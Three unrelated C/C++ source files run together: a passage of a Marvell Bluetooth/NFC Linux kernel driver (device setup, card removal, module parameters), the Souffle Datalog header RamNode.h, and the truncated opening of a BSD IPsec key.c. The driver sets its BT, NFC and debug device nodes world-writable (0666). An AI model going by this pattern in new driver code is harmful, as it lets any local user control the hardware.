priv->bt_dev.m_dev[NFC_SEQ].driver_data = priv; priv->bt_dev.m_dev[NFC_SEQ].read_continue_flag = 0; /** create char device for NFC */ char_dev = alloc_char_dev(); if (!char_dev) { class_destroy(chardev_class); ret = -ENOMEM; goto err_kmalloc; } char_dev->minor = NFCCHAR_MINOR_BASE + nfcchar_minor; char_dev->dev_type = NFC_TYPE; if (nfc_name) snprintf(nfc_dev->name, sizeof(nfc_dev->name), "%s%d", nfc_name, nfcchar_minor); else snprintf(nfc_dev->name, sizeof(nfc_dev->name), "mnfcchar%d", nfcchar_minor); snprintf(dev_file, sizeof(dev_file), "/dev/%s", nfc_dev->name); PRINTM(MSG, "BT: Create %s\n", dev_file); nfcchar_minor++; /** register m_dev to NFC char device */ priv->bt_dev.m_dev[NFC_SEQ].index = char_dev->minor; char_dev->m_dev = &(priv->bt_dev.m_dev[NFC_SEQ]); /** register char dev */ register_char_dev(char_dev, chardev_class, MODULE_NAME, nfc_dev->name); /** chmod for NFC char device */ mbtchar_chmod(dev_file, 0666); /** create proc device */ snprintf(priv->bt_dev.m_dev[NFC_SEQ].name, sizeof(priv->bt_dev.m_dev[NFC_SEQ].name), nfc_dev->name); bt_proc_init(priv, &(priv->bt_dev.m_dev[NFC_SEQ]), NFC_SEQ); } if ((debug_intf) && ((drv_mode & DRV_MODE_BT) || (drv_mode & DRV_MODE_FM) || (drv_mode & DRV_MODE_NFC))) { /** alloc debug_dev */ debug_dev = alloc_debug_dev(); if (!debug_dev) { PRINTM(FATAL, "Can not allocate debug dev\n"); ret = -ENOMEM; goto err_kmalloc; } /** init m_dev */ init_m_dev(&(priv->bt_dev.m_dev[DEBUG_SEQ])); priv->bt_dev.m_dev[DEBUG_SEQ].dev_type = DEBUG_TYPE; priv->bt_dev.m_dev[DEBUG_SEQ].spec_type = GENERIC_SPEC; priv->bt_dev.m_dev[DEBUG_SEQ].dev_pointer = (void *)debug_dev; priv->bt_dev.m_dev[DEBUG_SEQ].driver_data = priv; /** create char device for Debug */ char_dev = alloc_char_dev(); if (!char_dev) { class_destroy(chardev_class); ret = -ENOMEM; goto err_kmalloc; } char_dev->minor = DEBUGCHAR_MINOR_BASE + debugchar_minor; char_dev->dev_type = DEBUG_TYPE; if (debug_name) snprintf(debug_dev->name, sizeof(debug_dev->name), "%s%d", debug_name, debugchar_minor); else snprintf(debug_dev->name, sizeof(debug_dev->name), "mdebugchar%d", debugchar_minor); snprintf(dev_file, sizeof(dev_file), "/dev/%s", debug_dev->name); debugchar_minor++; /** register char dev */ priv->bt_dev.m_dev[DEBUG_SEQ].index = char_dev->minor; char_dev->m_dev = &(priv->bt_dev.m_dev[DEBUG_SEQ]); register_char_dev(char_dev, chardev_class, MODULE_NAME, debug_dev->name); /** chmod for debug char device */ mbtchar_chmod(dev_file, 0666); /** create proc device */ snprintf(priv->bt_dev.m_dev[DEBUG_SEQ].name, sizeof(priv->bt_dev.m_dev[DEBUG_SEQ].name), debug_dev->name); bt_proc_init(priv, &(priv->bt_dev.m_dev[DEBUG_SEQ]), DEBUG_SEQ); } if (init_cfg) if (BT_STATUS_SUCCESS != bt_init_config(priv, init_cfg)) { PRINTM(FATAL, "BT: Set user init data and param failed\n"); if (mbt_dev) { m_dev = &(priv->bt_dev.m_dev[BT_SEQ]); /** unregister m_dev to char_dev */ m_dev->close(m_dev); for (i = 0; i < 3; i++) kfree_skb(mbt_dev->reassembly[i]); /** unregister m_dev to char_dev */ chardev_cleanup_one(m_dev, chardev_class); free_m_dev(m_dev); } ret = BT_STATUS_FAILURE; goto done; } if (cal_cfg) { if (BT_STATUS_SUCCESS != bt_cal_config(priv, cal_cfg, bt_mac)) { PRINTM(FATAL, "BT: Set cal data failed\n"); if (mbt_dev) { m_dev = &(priv->bt_dev.m_dev[BT_SEQ]); /** unregister m_dev to char_dev */ m_dev->close(m_dev); for (i = 0; i < 3; i++) kfree_skb(mbt_dev->reassembly[i]); /** unregister m_dev to char_dev */ chardev_cleanup_one(m_dev, chardev_class); free_m_dev(m_dev); } ret = BT_STATUS_FAILURE; goto done; } } else if (bt_mac) { PRINTM(INFO, "Set BT mac_addr from insmod parametre bt_mac = %s\n", bt_mac); if (BT_STATUS_SUCCESS != bt_init_mac_address(priv, bt_mac)) { PRINTM(FATAL, "BT: Fail to set mac address from insmod parametre\n"); ret = BT_STATUS_FAILURE; goto done; } } if (cal_cfg_ext) { if (BT_STATUS_SUCCESS != bt_cal_config_ext(priv, cal_cfg_ext)) { PRINTM(FATAL, "BT: Set cal ext data failed\n"); if (mbt_dev) { m_dev = &(priv->bt_dev.m_dev[BT_SEQ]); /** unregister m_dev to char_dev */ m_dev->close(m_dev); for (i = 0; i < 3; i++) kfree_skb(mbt_dev->reassembly[i]); /** unregister m_dev to char_dev */ chardev_cleanup_one(m_dev, chardev_class); free_m_dev(m_dev); } ret = BT_STATUS_FAILURE; goto done; } } if (init_cfg || cal_cfg || bt_mac || cal_cfg_ext) { priv->adapter->tx_lock = FALSE; bt_restore_tx_queue(priv); } bt_register_hostwake_irq(NULL); /* Get FW version */ bt_get_fw_version(priv); snprintf(priv->adapter->drv_ver, MAX_VER_STR_LEN, mbt_driver_version, fw_version); done: LEAVE(); return ret; err_kmalloc: kfree(mbt_dev); kfree(fm_dev); kfree(nfc_dev); kfree(debug_dev); LEAVE(); return ret; } /** * @brief This function adds the card. it will probe the * card, allocate the bt_priv and initialize the device. * * @param card A pointer to card * @return A pointer to bt_private structure */ bt_private * bt_add_card(void *card) { bt_private *priv = NULL; ENTER(); priv = bt_alloc_priv(); if (!priv) { PRINTM(FATAL, "Can not allocate priv\n"); LEAVE(); return NULL; } /* allocate buffer for bt_adapter */ priv->adapter = kzalloc(sizeof(bt_adapter), GFP_KERNEL); if (!priv->adapter) { PRINTM(FATAL, "Allocate buffer for bt_adapter failed!\n"); goto err_kmalloc; } bt_init_adapter(priv); PRINTM(INFO, "Starting kthread...\n"); priv->MainThread.priv = priv; spin_lock_init(&priv->driver_lock); bt_create_thread(bt_service_main_thread, &priv->MainThread, "bt_main_service"); /* wait for mainthread to up */ while (!priv->MainThread.pid) os_sched_timeout(1); priv->bt_dev.card = card; ((struct sdio_mmc_card *)card)->priv = priv; priv->adapter->sd_ireg = 0; /* * Register the device. Fillup the private data structure with * relevant information from the card and request for the required * IRQ. */ if (sbi_register_dev(priv) < 0) { PRINTM(FATAL, "Failed to register bt device!\n"); goto err_registerdev; } if (bt_init_fw(priv)) { PRINTM(FATAL, "BT Firmware Init Failed\n"); goto err_init_fw; } LEAVE(); return priv; err_init_fw: bt_proc_remove(priv); PRINTM(INFO, "Unregister device\n"); sbi_unregister_dev(priv); err_registerdev: ((struct sdio_mmc_card *)card)->priv = NULL; /* Stop the thread servicing the interrupts */ priv->adapter->SurpriseRemoved = TRUE; wake_up_interruptible(&priv->MainThread.waitQ); while (priv->MainThread.pid) os_sched_timeout(1); err_kmalloc: if (priv->adapter) bt_free_adapter(priv); bt_priv_put(priv); LEAVE(); return NULL; } /** * @brief This function removes the card. * * @param card A pointer to card * @return BT_STATUS_SUCCESS */ int bt_remove_card(void *card) { struct m_dev *m_dev = NULL; bt_private *priv = (bt_private *) card; int i; ENTER(); if (!priv) { LEAVE(); return BT_STATUS_SUCCESS; } if (!priv->adapter->SurpriseRemoved) { bt_send_reset_command(priv); bt_send_module_cfg_cmd(priv, MODULE_SHUTDOWN_REQ); /* Disable interrupts on the card */ sd_disable_host_int(priv); priv->adapter->SurpriseRemoved = TRUE; } wake_up_interruptible(&priv->adapter->cmd_wait_q); priv->adapter->SurpriseRemoved = TRUE; wake_up_interruptible(&priv->MainThread.waitQ); while (priv->MainThread.pid) { os_sched_timeout(1); wake_up_interruptible(&priv->MainThread.waitQ); } bt_proc_remove(priv); PRINTM(INFO, "Unregister device\n"); sbi_unregister_dev(priv); if (priv->bt_dev.m_dev[BT_SEQ].dev_pointer) { m_dev = &(priv->bt_dev.m_dev[BT_SEQ]); if (m_dev->spec_type == IANYWHERE_SPEC) { if ((drv_mode & DRV_MODE_BT) && (mbtchar_minor > 0)) mbtchar_minor--; m_dev->close(m_dev); for (i = 0; i < 3; i++) kfree_skb(((struct mbt_dev *) (m_dev->dev_pointer))-> reassembly[i]); /** unregister m_dev to char_dev */ if (chardev_class) chardev_cleanup_one(m_dev, chardev_class); free_m_dev(m_dev); } } if (priv->bt_dev.m_dev[FM_SEQ].dev_pointer) { m_dev = &(priv->bt_dev.m_dev[FM_SEQ]); if ((drv_mode & DRV_MODE_FM) && (fmchar_minor > 0)) fmchar_minor--; m_dev->close(m_dev); /** unregister m_dev to char_dev */ if (chardev_class) chardev_cleanup_one(m_dev, chardev_class); free_m_dev(m_dev); } if (priv->bt_dev.m_dev[NFC_SEQ].dev_pointer) { m_dev = &(priv->bt_dev.m_dev[NFC_SEQ]); if ((drv_mode & DRV_MODE_NFC) && (nfcchar_minor > 0)) nfcchar_minor--; m_dev->close(m_dev); /** unregister m_dev to char_dev */ if (chardev_class) chardev_cleanup_one(m_dev, chardev_class); free_m_dev(m_dev); } if (priv->bt_dev.m_dev[DEBUG_SEQ].dev_pointer) { m_dev = &(priv->bt_dev.m_dev[DEBUG_SEQ]); if ((debug_intf) && (debugchar_minor > 0)) debugchar_minor--; /** unregister m_dev to char_dev */ if (chardev_class) chardev_cleanup_one(m_dev, chardev_class); free_m_dev(m_dev); } PRINTM(INFO, "Free Adapter\n"); bt_free_adapter(priv); bt_priv_put(priv); LEAVE(); return BT_STATUS_SUCCESS; } /** * @brief This function sets card detect * * @param on card detect status * @return 0 */ static int bt_set_carddetect(int on) { PRINTM(MSG, "%s = %d\n", __func__, on); if (bt_control_data && bt_control_data->set_carddetect) bt_control_data->set_carddetect(on); return 0; } /** * @brief This function sets power * * @param on power status * @return 0 */ static int bt_set_power(int on, unsigned long msec) { PRINTM(MSG, "%s = %d\n", __func__, on); if (bt_control_data && bt_control_data->set_power) bt_control_data->set_power(on); if (msec) mdelay(msec); return 0; } static irqreturn_t bt_hostwake_isr(int irq, void *dev_id) { PRINTM(INTR, "Recv hostwake isr\n"); return IRQ_HANDLED; } void bt_enable_hostwake_irq(int flag) { if (bt_irqres && irq_registered) { PRINTM(INTR, "enable_hostwake_irq=%d\n", flag); if (flag) { enable_irq(bt_irqres->start); enable_irq_wake(bt_irqres->start); } else { disable_irq_wake(bt_irqres->start); disable_irq(bt_irqres->start); } } } static void bt_register_hostwake_irq(void *handle) { if (bt_irqres && !irq_registered) { irq_registered = request_irq(bt_irqres->start, bt_hostwake_isr, bt_irqres->flags, DRIVER_NAME, handle); if (irq_registered < 0) PRINTM(ERROR, "Couldn't acquire BT_HOST_WAKE IRQ\n"); else { irq_registered = 1; enable_irq_wake(bt_irqres->start); bt_enable_hostwake_irq(FALSE); } } } void mdev_poweroff(struct m_dev *m_dev) { ENTER(); if (minicard_pwrup) { bt_set_power(0, 0); bt_set_carddetect(0); } LEAVE(); } /** * @brief This function probes the platform-level device * * @param pdev pointer to struct platform_device * @return 0 */ static int bt_probe(struct platform_device *pdev) { struct wifi_platform_data *bt_ctrl = (struct wifi_platform_data *)(pdev->dev.platform_data); ENTER(); bt_irqres = platform_get_resource_byname(pdev, IORESOURCE_IRQ, IORESOURCE_NAME); if (minicard_pwrup) { bt_control_data = bt_ctrl; bt_set_power(1, 0); /* Power On */ bt_set_carddetect(1); /* CardDetect (0->1) */ } LEAVE(); return 0; } /** * @brief This function removes the platform-level device * * @param pdev pointer to struct platform_device * @return 0 */ static int bt_remove(struct platform_device *pdev) { struct wifi_platform_data *bt_ctrl = (struct wifi_platform_data *)(pdev->dev.platform_data); ENTER(); if (bt_irqres && irq_registered) { PRINTM(MSG, "Free hostwake IRQ wakeup\n"); free_irq(bt_irqres->start, NULL); irq_registered = 0; } if (minicard_pwrup) { bt_control_data = bt_ctrl; bt_set_power(0, 0); /* Power Off */ bt_set_carddetect(0); /* CardDetect (1->0) */ } LEAVE(); return 0; } static struct platform_driver bt_device = { .probe = bt_probe, .remove = bt_remove, .driver = { .name = "mrvl_bt", } }; /** * @brief This function registers the platform-level device to the bus driver * * @return 0--success, failure otherwise */ static int bt_add_dev(void) { int ret = 0; ENTER(); ret = platform_driver_register(&bt_device); LEAVE(); return ret; } /** * @brief This function deregisters the platform-level device * * @return N/A */ static void bt_del_dev(void) { ENTER(); platform_driver_unregister(&bt_device); LEAVE(); } /** * @brief This function initializes module. * * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ static int bt_init_module(void) { int ret = BT_STATUS_SUCCESS; ENTER(); PRINTM(MSG, "BT: Loading driver\n"); bt_root_proc_init(); /** create char device class */ chardev_class = class_create(THIS_MODULE, MODULE_NAME); if (IS_ERR(chardev_class)) { PRINTM(ERROR, "Unable to allocate class\n"); bt_root_proc_remove(); ret = PTR_ERR(chardev_class); goto done; } bt_add_dev(); if (sbi_register() == NULL) { bt_root_proc_remove(); ret = BT_STATUS_FAILURE; goto done; } done: if (ret) PRINTM(MSG, "BT: Driver loading failed\n"); else PRINTM(MSG, "BT: Driver loaded successfully\n"); LEAVE(); return ret; } /** * @brief This function cleans module * * @return N/A */ static void bt_exit_module(void) { ENTER(); PRINTM(MSG, "BT: Unloading driver\n"); sbi_unregister(); bt_root_proc_remove(); bt_del_dev(); class_destroy(chardev_class); PRINTM(MSG, "BT: Driver unloaded\n"); LEAVE(); } module_init(bt_init_module); module_exit(bt_exit_module); MODULE_AUTHOR("Marvell International Ltd."); MODULE_DESCRIPTION("Marvell Bluetooth Driver Ver. " VERSION); MODULE_VERSION(VERSION); MODULE_LICENSE("GPL"); module_param(fw, int, 1); MODULE_PARM_DESC(fw, "0: Skip firmware download; otherwise: Download firmware"); module_param(psmode, int, 1); MODULE_PARM_DESC(psmode, "1: Enable powermode; 0: Disable powermode"); #ifdef DEBUG_LEVEL1 module_param(mbt_drvdbg, uint, 0); MODULE_PARM_DESC(mbt_drvdbg, "BIT3:DBG_DATA BIT4:DBG_CMD 0xFF:DBG_ALL"); #endif #ifdef SDIO_SUSPEND_RESUME module_param(mbt_pm_keep_power, int, 1); MODULE_PARM_DESC(mbt_pm_keep_power, "1: PM keep power; 0: PM no power"); #endif module_param(init_cfg, charp, 0); MODULE_PARM_DESC(init_cfg, "BT init config file name"); module_param(cal_cfg, charp, 0); MODULE_PARM_DESC(cal_cfg, "BT calibrate file name"); module_param(cal_cfg_ext, charp, 0); MODULE_PARM_DESC(cal_cfg_ext, "BT calibrate ext file name"); module_param(bt_mac, charp, 0); MODULE_PARM_DESC(bt_mac, "BT init mac address"); module_param(minicard_pwrup, int, 0); MODULE_PARM_DESC(minicard_pwrup, "1: Driver load clears PDn/Rst, unload sets (default); 0: Don't do this."); module_param(drv_mode, int, 0); MODULE_PARM_DESC(drv_mode, "Bit 0: BT/AMP/BLE; Bit 1: FM; Bit 2: NFC"); module_param(bt_name, charp, 0); MODULE_PARM_DESC(bt_name, "BT interface name"); module_param(fm_name, charp, 0); MODULE_PARM_DESC(fm_name, "FM interface name"); module_param(nfc_name, charp, 0); MODULE_PARM_DESC(nfc_name, "NFC interface name"); module_param(debug_intf, int, 1); MODULE_PARM_DESC(debug_intf, "1: Enable debug interface; 0: Disable debug interface "); module_param(debug_name, charp, 0); MODULE_PARM_DESC(debug_name, "Debug interface name");
/* * Souffle - A Datalog Compiler * Copyright (c) 2013, 2015, Oracle and/or its affiliates. All rights reserved * Licensed under the Universal Permissive License v 1.0 as shown at: * - https://opensource.org/licenses/UPL * - <souffle root>/licenses/SOUFFLE-UPL.txt */ /************************************************************************ * * @file RamNode.h * * Top level syntactic element of intermediate representation, * i.e., a node of the RAM machine code. * ***********************************************************************/ #pragma once #include <cassert> #include <functional> #include <iostream> #include <memory> #include <typeinfo> #include <vector> namespace souffle { class RamNode; /** * @class RamNodeMapper * @brief An abstract class for manipulating RAM Nodes by substitution */ class RamNodeMapper { public: virtual ~RamNodeMapper() = default; /** * @brief Abstract replacement method for a node. * * If the given nodes is to be replaced, the handed in node * will be destroyed by the mapper and the returned node * will become owned by the caller. */ virtual std::unique_ptr<RamNode> operator()(std::unique_ptr<RamNode> node) const = 0; /** * @brief Wrapper for any subclass of the RAM node hierarchy performing type casts. */ template <typename T> std::unique_ptr<T> operator()(std::unique_ptr<T> node) const { std::unique_ptr<RamNode> resPtr = (*this)(std::unique_ptr<RamNode>(static_cast<RamNode*>(node.release()))); assert(nullptr != dynamic_cast<T*>(resPtr.get()) && "Invalid target node!"); return std::unique_ptr<T>(dynamic_cast<T*>(resPtr.release())); } }; namespace detail { /** * @class LambdaRamNodeMapper * @brief A special RamNodeMapper wrapping a lambda conducting node transformations. */ template <typename Lambda> class LambdaRamNodeMapper : public RamNodeMapper { const Lambda& lambda; public: /** * @brief Constructor for LambdaRamNodeMapper */ LambdaRamNodeMapper(const Lambda& lambda) : lambda(lambda) {} /** * @brief Applies lambda */ std::unique_ptr<RamNode> operator()(std::unique_ptr<RamNode> node) const override { return lambda(std::move(node)); } }; } // namespace detail /** * @brief Creates a node mapper based on a corresponding lambda expression. */ template <typename Lambda> detail::LambdaRamNodeMapper<Lambda> makeLambdaRamMapper(const Lambda& lambda) { return detail::LambdaRamNodeMapper<Lambda>(lambda); } /** * @class RamNode * @brief RamNode is a superclass for all RAM IR classes. */ class RamNode { public: /* * @brief A virtual destructor for RAM nodes */ virtual ~RamNode() = default; /** * @brief Equivalence check for two RAM nodes */ bool operator==(const RamNode& other) const { return this == &other || (typeid(*this) == typeid(other) && equal(other)); } /** * @brief Inequality check for two RAM nodes */ bool operator!=(const RamNode& other) const { return !(*this == other); } /** * @brief Create a clone (i.e. deep copy) of this node */ virtual RamNode* clone() const = 0; /** * @brief Apply the mapper to all child nodes */ virtual void apply(const RamNodeMapper& mapper) {} /** * @brief Rewrite a child node */ virtual void rewrite(const RamNode* oldNode, std::unique_ptr<RamNode> newNode) { std::function<std::unique_ptr<RamNode>(std::unique_ptr<RamNode>)> rewriter = [&](std::unique_ptr<RamNode> node) -> std::unique_ptr<RamNode> { if (oldNode == node.get()) { return std::move(newNode); } else { node->apply(makeLambdaRamMapper(rewriter)); return node; } }; apply(makeLambdaRamMapper(rewriter)); }; /** * @brief Obtain list of all embedded child nodes */ virtual std::vector<const RamNode*> getChildNodes() const { return {}; } /** * @brief Print RAM node */ virtual void print(std::ostream& out = std::cout) const = 0; /** * Print RAM on a stream */ friend std::ostream& operator<<(std::ostream& out, const RamNode& node) { node.print(out); return out; } protected: /** * @brief Equality check for two RAM nodes. * Default action is that nothing needs to be checked. */ virtual bool equal(const RamNode& other) const { return true; } }; } // end of namespace souffle
/* $FreeBSD: src/sys/netipsec/key.c,v 1.3.2.1 2003/01/24 05:11:35 sam Exp $ */ /* $KAME: key.c,v 1.191 2001/06/27 10:46:49 sakane Exp $ */ /* * Copyright (C) 1995, 1996, 1997, and 1998 WIDE Project. * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. Neither the name of the project nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE PROJECT AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE PROJECT OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ /* * This code is referd to RFC 2367 */ #include "opt_inet.h" #include "opt_inet6.h" #include "opt_ipsec.h" #include <sys/types.h> #include <sys/param.h> #include <sys/systm.h> #include <sys/kernel.h> #include <sys/mbuf.h> #include <sys/domain.h> #include <sys/protosw.h> #include <sys/malloc.h> #include <sys/socket.h> #include <sys/socketvar.h> #include <sys/sysctl.h> #include <sys/errno.h> #include <sys/proc.h> #include <sys/queue.h> #include <sys/syslog.h> #include <net/if.h> #include <net/route.h> #include <net/raw_cb.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/in_var.h> #ifdef INET6 #include <netinet/ip6.h> #include <netinet6/in6_var.h> #include <netinet6/ip6_var.h> #endif /* INET6 */ #ifdef INET #include <netinet/in_pcb.h> #endif #ifdef INET6 #include <netinet6/in6_pcb.h> #endif /* INET6 */ #include <net/pfkeyv2.h> #include <netproto/ipsec/keydb.h> #include <netproto/ipsec/key.h> #include <netproto/ipsec/keysock.h> #include <netproto/ipsec/key_debug.h> #include <netproto/ipsec/ipsec.h> #ifdef INET6 #include <netproto/ipsec/ipsec6.h> #endif #include <netproto/ipsec/xform.h> #include <machine/stdarg.h> /* randomness */ #include <sys/random.h> #include <net/net_osdep.h> #define FULLMASK 0xff #define _BITS(bytes) ((bytes) << 3) /* * Note on SA reference counting: * - SAs that are not in DEAD state will have (total external reference + 1) * following value in reference count field. they cannot be freed and are * referenced from SA header. * - SAs that are in DEAD state will have (total external reference) * in reference count field. they are ready to be freed. reference from * SA header will be removed in key_delsav(), when the reference count * field hits 0 (= no external reference other than from SA header. */ #ifndef IPSEC_DEBUG2 static struct callout key_timehandler_ch; #endif u_int32_t key_debug_level = 0; static u_int key_spi_trycnt = 1000; static u_int32_t key_spi_minval = 0x100; static u_int32_t key_spi_maxval = 0x0fffffff; /* XXX */ static u_int32_t policy_id = 0; static u_int key_int_random = 60; /*interval to initialize randseed,1(m)*/ static u_int key_larval_lifetime = 30; /* interval to expire acquiring, 30(s)*/ static int key_blockacq_count = 10; /* counter for blocking SADB_ACQUIRE.*/ static int key_blockacq_lifetime = 20; /* lifetime for blocking SADB_ACQUIRE.*/ static int key_prefered_oldsa = 1; /* prefered old sa rather than new sa.*/ static u_int32_t acq_seq = 0; static int key_tick_init_random = 0; static LIST_HEAD(_sptree, secpolicy) sptree[IPSEC_DIR_MAX]; /* SPD */ static LIST_HEAD(_sahtree, secashead) sahtree; /* SAD */ static LIST_HEAD(_regtree, secreg) regtree[SADB_SATYPE_MAX + 1]; /* registed list */ #ifndef IPSEC_NONBLOCK_ACQUIRE static LIST_HEAD(_acqtree, secacq) acqtree; /* acquiring list */ #endif static LIST_HEAD(_spacqtree, secspacq) spacqtree; /* SP acquiring list */ /* search order for SAs */ static u_int saorder_state_valid[] = { SADB_SASTATE_DYING, SADB_SASTATE_MATURE, /* * This order is important because we must select the oldest SA * for outbound processing. For inbound, This is not important. */ }; static u_int saorder_state_alive[] = { /* except DEAD */ SADB_SASTATE_MATURE, SADB_SASTATE_DYING, SADB_SASTATE_LARVAL }; static u_int saorder_state_any[] = { SADB_SASTATE_MATURE, SADB_SASTATE_DYING, SADB_SASTATE_LARVAL, SADB_SASTATE_DEAD }; static const int minsize[] = { sizeof(struct sadb_msg), /* SADB_EXT_RESERVED */ sizeof(struct sadb_sa), /* SADB_EXT_SA */ sizeof(struct sadb_lifetime), /* SADB_EXT_LIFETIME_CURRENT */ sizeof(struct sadb_lifetime), /* SADB_EXT_LIFETIME_HARD */ sizeof(struct sadb_lifetime), /* SADB_EXT_LIFETIME_SOFT */ sizeof(struct sadb_address), /* SADB_EXT_ADDRESS_SRC */ sizeof(struct sadb_address), /* SADB_EXT_ADDRESS_DST */ sizeof(struct sadb_address), /* SADB_EXT_ADDRESS_PROXY */ sizeof(struct sadb_key), /* SADB_EXT_KEY_AUTH */ sizeof(struct sadb_key), /* SADB_EXT_KEY_ENCRYPT */ sizeof(struct sadb_ident), /* SADB_EXT_IDENTITY_SRC */ sizeof(struct sadb_ident), /* SADB_EXT_IDENTITY_DST */ sizeof(struct sadb_sens), /* SADB_EXT_SENSITIVITY */ sizeof(struct sadb_prop), /* SADB_EXT_PROPOSAL */ sizeof(struct sadb_supported), /* SADB_EXT_SUPPORTED_AUTH */ sizeof(struct sadb_supported), /* SADB_EXT_SUPPORTED_ENCRYPT */ sizeof(struct sadb_spirange), /* SADB_EXT_SPIRANGE */ 0, /* SADB_X_EXT_KMPRIVATE */ sizeof(struct sadb_x_policy), /* SADB_X_EXT_POLICY */ sizeof(struct sadb_x_sa2), /* SADB_X_SA2 */ }; static const int maxsize[] = { sizeof(struct sadb_msg), /* SADB_EXT_RESERVED */ sizeof(struct sadb_sa), /* SADB_EXT_SA */ sizeof(struct sadb_lifetime), /* SADB_EXT_LIFETIME_CURRENT */ sizeof(struct sadb_lifetime), /* SADB_EXT_LIFETIME_HARD */ sizeof(struct sadb_lifetime), /* SADB_EXT_LIFETIME_SOFT */ 0, /* SADB_EXT_ADDRESS_SRC */ 0, /* SADB_EXT_ADDRESS_DST */ 0, /* SADB_EXT_ADDRESS_PROXY */ 0, /* SADB_EXT_KEY_AUTH */ 0, /* SADB_EXT_KEY_ENCRYPT */ 0, /* SADB_EXT_IDENTITY_SRC */ 0, /* SADB_EXT_IDENTITY_DST */ 0, /* SADB_EXT_SENSITIVITY */ 0, /* SADB_EXT_PROPOSAL */ 0, /* SADB_EXT_SUPPORTED_AUTH */ 0, /* SADB_EXT_SUPPORTED_ENCRYPT */ sizeof(struct sadb_spirange), /* SADB_EXT_SPIRANGE */ 0, /* SADB_X_EXT_KMPRIVATE */ 0, /* SADB_X_EXT_POLICY */ sizeof(struct sadb_x_sa2), /* SADB_X_SA2 */ }; static int ipsec_esp_keymin = 256; static int ipsec_esp_auth = 0; static int ipsec_ah_keymin = 128; #ifdef SYSCTL_DECL SYSCTL_DECL(_net_key); #endif SYSCTL_INT(_net_key, KEYCTL_DEBUG_LEVEL, debug, CTLFLAG_RW, \ &key_debug_level, 0, ""); /* max count of trial for the decision of spi value */ SYSCTL_INT(_net_key, KEYCTL_SPI_TRY, spi_trycnt, CTLFLAG_RW, \ &key_spi_trycnt, 0, ""); /* minimum spi value to allocate automatically. */ SYSCTL_INT(_net_key, KEYCTL_SPI_MIN_VALUE, spi_minval, CTLFLAG_RW, \ &key_spi_minval, 0, ""); /* maximun spi value to allocate automatically. */ SYSCTL_INT(_net_key, KEYCTL_SPI_MAX_VALUE, spi_maxval, CTLFLAG_RW, \ &key_spi_maxval, 0, ""); /* interval to initialize randseed */ SYSCTL_INT(_net_key, KEYCTL_RANDOM_INT, int_random, CTLFLAG_RW, \ &key_int_random, 0, ""); /* lifetime for larval SA */ SYSCTL_INT(_net_key, KEYCTL_LARVAL_LIFETIME, larval_lifetime, CTLFLAG_RW, \ &key_larval_lifetime, 0, ""); /* counter for blocking to send SADB_ACQUIRE to IKEd */ SYSCTL_INT(_net_key, KEYCTL_BLOCKACQ_COUNT, blockacq_count, CTLFLAG_RW, \ &key_blockacq_count, 0, ""); /* lifetime for blocking to send SADB_ACQUIRE to IKEd */ SYSCTL_INT(_net_key, KEYCTL_BLOCKACQ_LIFETIME, blockacq_lifetime, CTLFLAG_RW, \ &key_blockacq_lifetime, 0, ""); /* ESP auth */ SYSCTL_INT(_net_key, KEYCTL_ESP_AUTH, esp_auth, CTLFLAG_RW, \ &ipsec_esp_auth, 0, ""); /* minimum ESP key length */ SYSCTL_INT(_net_key, KEYCTL_ESP_KEYMIN, esp_keymin, CTLFLAG_RW, \ &ipsec_esp_keymin, 0, ""); /* minimum AH key length */ SYSCTL_INT(_net_key, KEYCTL_AH_KEYMIN, ah_keymin, CTLFLAG_RW, \ &ipsec_ah_keymin, 0, ""); /* perfered old SA rather than new SA */ SYSCTL_INT(_net_key, KEYCTL_PREFERED_OLDSA, prefered_oldsa, CTLFLAG_RW,\ &key_prefered_oldsa, 0, ""); #define __LIST_CHAINED(elm) \ (!((elm)->chain.le_next == NULL && (elm)->chain.le_prev == NULL)) #define LIST_INSERT_TAIL(head, elm, type, field) \ do {\ struct type *curelm = LIST_FIRST(head); \ if (curelm == NULL) {\ LIST_INSERT_HEAD(head, elm, field); \ } else { \ while (LIST_NEXT(curelm, field)) \ curelm = LIST_NEXT(curelm, field);\ LIST_INSERT_AFTER(curelm, elm, field);\ }\ } while (0) #define KEY_CHKSASTATE(head, sav, name) \ do { \ if ((head) != (sav)) { \ ipseclog((LOG_DEBUG, "%s: state mismatched (TREE=%d SA=%d)\n", \ (name), (head), (sav))); \ continue; \ } \ } while (0) #define KEY_CHKSPDIR(head, sp, name) \ do { \ if ((head) != (sp)) { \ ipseclog((LOG_DEBUG, "%s: direction mismatched (TREE=%d SP=%d), " \ "anyway continue.\n", \ (name), (head), (sp))); \ } \ } while (0) MALLOC_DEFINE(M_SECA, "key mgmt", "security associations, key management"); #if 1 #define KMALLOC(p, t, n) \ ((p) = (t) kmalloc((unsigned long)(n), M_SECA, M_INTWAIT | M_NULLOK)) #define KFREE(p) \ kfree((caddr_t)(p), M_SECA) #else #define KMALLOC(p, t, n) \ do { \ ((p) = (t)kmalloc((unsigned long)(n), M_SECA, M_INTWAIT | M_NULLOK)); \ kprintf("%s %d: %p <- KMALLOC(%s, %d)\n", \ __FILE__, __LINE__, (p), #t, n); \ } while (0) #define KFREE(p) \ do { \ kprintf("%s %d: 